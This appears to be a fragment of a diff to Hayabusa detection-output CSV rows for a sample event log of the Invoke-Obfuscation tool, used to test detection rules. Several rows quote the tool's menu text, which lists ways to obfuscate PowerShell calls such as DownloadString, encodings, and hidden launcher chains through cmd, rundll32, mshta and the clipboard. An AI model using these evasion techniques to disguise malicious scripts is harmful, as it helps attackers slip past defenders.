$MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. <d`Ow`NLoAd`STRin`g>' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute <ALL> Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , '<Concatenate> entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , '<Reorder> entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , '<Reverse> entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as <ASCII>"" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as <Hex>"" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as <Octal>"" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as <Binary>"" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as <SecureString> (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as <BXOR>"" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as <Special Characters>"" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as <Whitespace>"" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. $MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t<PowerShell>"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , '<Cmd> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , '<Wmic> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , '<Rundll32> + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set <Var> && PowerShell iex <Var>') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + <Echo> | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + <Echo> | Clip && PowerShell iex <clipboard>') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set <Var> && Cmd && PowerShell iex <Var>') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set <Var> && Cmd <Echo> | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + <Echo> | Clip && Cmd && PowerShell iex <clipboard>') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && <Rundll32> && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && <Mshta> && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} 